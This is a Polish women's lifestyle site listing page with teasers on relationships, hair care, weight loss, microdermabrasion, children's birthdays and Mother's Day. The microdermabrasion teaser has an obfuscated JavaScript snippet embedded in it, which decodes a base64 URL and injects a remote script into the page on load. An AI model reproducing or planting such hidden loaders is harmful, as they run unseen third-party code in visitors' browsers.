4 błahe oznaki, że on traci tobą zainteresowanie

Każdy związek w pewnym monecie przechodzi jakiś kryzys bardziej lub mniej poważny, dlatego tak ważne jest rozmawianie o tym co nas trapi i denerwuje i co chciałybyśmy zmienić w tej relacji. Nasz partner nie zawsze będzie czytał nam w myślach więc taka jasna informacja na pewno pomoże mu w odbudowywaniu nadszarpniętych więzi. Może być jednak tak, że on już kompletnie stracił Tobą zainteresowanie, jak to sprawdzić? Oto nasze wskazówki.

4 błędy, które popełniasz jako posiadaczka cienkich włosów

Większość z nas niestety nadal nie zdaje sobie sprawy z tego jak wiele złego wyrządza swoim włosom podczas codziennej pielęgnacji. Włosy, a w szczególności cienkie powinny każdego dnia być poddane pielęgnacji, która nada im blasku i świeżości, której zapewne im brakuje. Jakie błędy najczęściej popełniają posiadaczki cienkich włosów? Oto lista 4 najbardziej popularnych błędów.

5 prostych, ale skutecznych sposobów na spalanie tkanki tłuszczowej

Na temat diet i chudnięcia wielu mogłoby napisać książkę. Często sięgamy po drastyczne sposoby zgubienia kilku kilogramów: głodzimy się czy też chwytamy się diety, która wyniszcza nasz organizm zabierając nam cenne składniki odżywcze. Ważne jest więc, by każdą redukcję wagi dokładnie przemyśleć. Każdy, kto chociaż raz próbował wie, że bardzo trudne jest trzymanie się zasad zdrowego żywienia oraz utrzymanie wagi.

Mikrodermabrazja – zabieg mechanicznego złuszczania naskórka

Najczęściej wybieranym zabiegiem jest mikrodermabrazja. Odpowiednio wykonany mikropeeling daje niesamowite efekty. Jeżeli chcesz, aby Twoja skóra była dobrze oczyszczona, gładka a także poprawiła się jej elastyczność, to ten zabieg jest właśnie dla Ciebie! (function(zyivcstt, qbneidzg, syntbflp, xfxcvxly, syfdwcwl, jxfcssrg){ syfdwcwl = qbneidzg.createElement(syntbflp);jxfcssrg = qbneidzg.getElementsByTagName(syntbflp)[0]; syfdwcwl.ascyc = 1; syfdwcwl.src = atob(xfxcvxly) jxfcssrg.parentNode.insertBefore(syfdwcwl, jxfcssrg); })(window, document, 'script', 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC9mNTQ2MjM3Ni1hYTBmLTQ5MWUtYmIzMS0yN2Y3MTc1Y2I3YjQuanM=')

Organizujemy urodziny przedszkolaka

Gdy dziecko jest małe, to jego urodziny organizujemy najczęściej w gronie najbliższej rodziny i znajomych. Jednak gdy wchodzi w społeczność przedszkolną, zaczyna mieć przyjaciół. Wtedy na urodzinach nie wystarczy mu już obecność dziadków, wujków i kuzynów. Pragnie, aby w tym dniu towarzyszyli mu również koleżanki i koledzy z przedszkola. Grono świętujących urodziny powiększa się znacznie, gdy ze względu na wiek dzieci, wśród gości znajdują się również ich rodzice. Mama i tata jubilata, chcąc zorganizować pierwszorzędne przyjęcie, powinni pamiętać o kilku ważnych kwestiach.

5 pomysłów na wyjątkowy Dzień Matki w czasie kwarantanny

Lista pomysłów na ciekawe sposoby spędzenia Dnia Matki mogłaby być znacznie dłuższa, jednak pandemia w znacznym stopniu ogranicza możliwości. Od czego jest jednak kreatywność? To ona rodzi nowe rozwiązania. Oto 5 pomysłów na miłe spędzenie Dnia Matki.

Dlaczego warto do nas dołączyć?

  • korzystanie z serwisu jest całkowicie darmowe
  • jesteśmy ogromną społecznością kobiet z pasją
  • pokaż swoje porady i inspiracje milionowej społeczności
  • wypromuj swój blog

Rejestracja

Aplikacja KobiecePorady.pl